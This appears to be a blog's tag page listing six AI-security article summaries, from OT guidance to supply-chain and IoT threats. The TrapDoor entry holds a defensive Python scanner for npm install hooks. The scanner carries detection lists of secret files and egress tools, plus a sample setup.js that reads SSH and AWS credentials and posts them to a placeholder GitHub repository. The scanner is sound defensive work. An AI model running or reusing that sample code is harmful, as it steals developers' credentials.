๐Ÿท๏ธ AI-security

6 articles tagged AI-security.

CISA and Five Allies Tell You Not to Put LLMs in Safety-Critical OT Systems — Here's the Actual Guidance

A joint guidance document issued by CISA, the Australian Signals Directorate's ACSC, and international partners establishes principles for integrating AI into operational technology environments. The guidance explicitly differentiates acceptable AI use by Purdue Model layer, warns against LLM-first approaches for safety-critical decisions in OT, and requires AI vendors supplying OT environments to provide software bills of materials, data residency documentation, and transparent AI feature disclosure. For organizations running smart buildings and industrial systems, this is the clearest official framework yet for AI in OT.

TrapDoor: The Supply Chain Attack Targeting AI Developers That's Stealing Cloud Keys and SSH Credentials

The TrapDoor supply chain campaign, active as of May 22, 2026, is targeting AI developer communities through malicious packages in public repositories. The packages use preinstall scripts to steal cloud credentials, SSH keys, and developer secrets, then exfiltrate them through GitHub-based command and control infrastructure. The campaign is specifically targeting the tooling and repositories used by AI development teams — a population with access to cloud environments, model infrastructure, and enterprise data pipelines.
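
The install-hook shape described above (a lifecycle script that reads secrets from the developer's home directory and posts them to GitHub-hosted infrastructure) is something you can audit for before `npm install` runs it. The scanner below is an added example written for this listing, not code from the TrapDoor write-up: it assumes the npm ecosystem, its indicator lists are generic assumptions about what a credential-stealing hook looks like rather than the campaign's real indicators, and the two manifests plus `setup.js` at the bottom are constructed sample input. It follows a hook that only runs a helper file (`node setup.js`) into that file, since that is where the behaviour usually hides.

```python
"""Audit npm package manifests for install-time lifecycle hooks that read
developer secrets and can send them off the host.

Added example, not the TrapDoor write-up's code. Indicator lists are generic
assumptions, not the campaign's IoCs; sample manifests are constructed.
"""
import json
import re
from pathlib import Path
from typing import Callable, Optional

# npm runs these automatically during `npm install`; no user action needed.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Where developer secrets usually live (assumed, generic list).
SECRET_PATTERNS = [
    r"\.ssh", r"\.aws", r"\.config/gcloud", r"\.azure", r"\.kube/config",
    r"\.npmrc", r"\.docker/config\.json", r"\.git-credentials",
    r"AWS_SECRET_ACCESS_KEY", r"GITHUB_TOKEN", r"OPENAI_API_KEY",
]
# Ways an install hook can push data out, including GitHub-hosted C2 (assumed).
EGRESS_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\bfetch\(", r"https?://",
    r"api\.github\.com", r"gist\.github\.com", r"raw\.githubusercontent\.com",
]
# Helper files a hook command invokes, e.g. "node setup.js".
SCRIPT_FILE_RE = re.compile(r"[\w./-]+\.(?:js|mjs|cjs|sh|py)\b")


def scan_hooks(manifest: dict,
               read_file: Callable[[str], Optional[str]] = lambda _: None) -> list[dict]:
    """Return one finding per lifecycle hook present in `manifest`.

    `read_file(relative_path)` supplies helper scripts the hook runs, so the
    hook is judged on their contents too; None means the file is unavailable.
    """
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        text, unresolved = cmd, []
        for rel in SCRIPT_FILE_RE.findall(cmd):
            body = read_file(rel.removeprefix("./"))
            if body is None:
                unresolved.append(rel)      # opaque helper: cannot clear it
            else:
                text += "\n" + body
        secrets = [p for p in SECRET_PATTERNS if re.search(p, text)]
        egress = [p for p in EGRESS_PATTERNS if re.search(p, text)]
        if secrets and egress:
            severity = "high"       # reads secrets and can ship them out
        elif secrets or egress or unresolved:
            severity = "medium"     # half the pattern, or an unreadable helper
        else:
            severity = "low"        # still runs code at install time; review it
        findings.append({
            "package": manifest.get("name", "<unnamed>"), "hook": hook,
            "command": cmd, "secret_indicators": secrets,
            "egress_indicators": egress, "unresolved_files": unresolved,
            "severity": severity,
        })
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Walk a checkout or node_modules tree and scan every package.json."""
    results = []
    for manifest_path in root.rglob("package.json"):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue

        def read_file(rel: str, pkg_dir: Path = manifest_path.parent) -> Optional[str]:
            target = pkg_dir / rel
            return target.read_text(encoding="utf-8", errors="replace") if target.is_file() else None

        results.extend(scan_hooks(manifest, read_file))
    return results


# --- constructed sample input (not real packages) ---
BENIGN_MANIFEST = {"name": "native-addon", "version": "1.0.0",
                   "scripts": {"test": "jest", "postinstall": "node-gyp rebuild"}}
SUSPICIOUS_MANIFEST = {"name": "ai-agent-toolkit", "version": "0.3.1",
                       "scripts": {"preinstall": "node setup.js"}}
# Hypothetical setup.js of the described shape: read keys, post them to GitHub.
SUSPICIOUS_SETUP_JS = """
const fs = require('fs'), os = require('os'), path = require('path');
const loot = [
  fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_ed25519'), 'utf8'),
  fs.readFileSync(path.join(os.homedir(), '.aws', 'credentials'), 'utf8'),
].join('\\n');
fetch('https://api.github.com/repos/example-org/example-repo/issues',
      { method: 'POST', body: JSON.stringify({ title: 'x', body: loot }) });
"""


def demo() -> dict[str, str]:
    """Scan both constructed manifests; returns {package name: severity}."""
    files = {"setup.js": SUSPICIOUS_SETUP_JS}
    return {f["package"]: f["severity"]
            for m in (BENIGN_MANIFEST, SUSPICIOUS_MANIFEST)
            for f in scan_hooks(m, files.get)}


if __name__ == "__main__":
    for finding in scan_hooks(SUSPICIOUS_MANIFEST, {"setup.js": SUSPICIOUS_SETUP_JS}.get):
        print(finding)
```

Run `scan_tree(Path("node_modules"))` after a dry install, or over a vendored checkout, and triage anything rated medium or high by reading the hook and its helper files. The blunt control that makes this class of campaign inert is `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) on developer machines and CI, re-enabling scripts only for the handful of packages that genuinely need a native build step.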

Vercel Got Hacked Through an AI Tool's OAuth Token — Every Enterprise Using Third-Party AI Has This Problem

Attackers breached Vercel by compromising Context.ai's Google Workspace OAuth application, stealing an employee's credentials and accessing customer data. The attack vector — a trusted third-party AI tool with OAuth access to enterprise systems — is present in thousands of organizations.

Shadow AI Is Your Biggest Unmanaged IoT Problem — And 76% of Organizations Already Have It

Shadow AI has surged to 76% of organizations in 2026, up from 61% a year ago. AI agents now autonomously control IoT devices, access operational systems, and make decisions without security oversight. The result is a new category of unmanaged attack surface that most enterprise security teams aren't equipped to handle.

165 Vulnerabilities, Zero-Day SharePoint Exploits, and AI Prompt Injection: Microsoft's April Patch Tuesday Is a Turning Point

Microsoft's April 2026 Patch Tuesday addressed 165 vulnerabilities — including actively exploited SharePoint zero-days and, for the first time, AI prompt injection vulnerabilities in Microsoft 365 Copilot. The AI attack surface is officially on the patch list.

AI-Powered IoT Attacks: The New Generation of Smart Office Threats in 2026

AI-driven IoT attacks surged 54% in 2026, with autonomous malware that learns, adapts, and evolves faster than human defenders can respond.

โ† All topics

Ask Sage ๐Ÿค–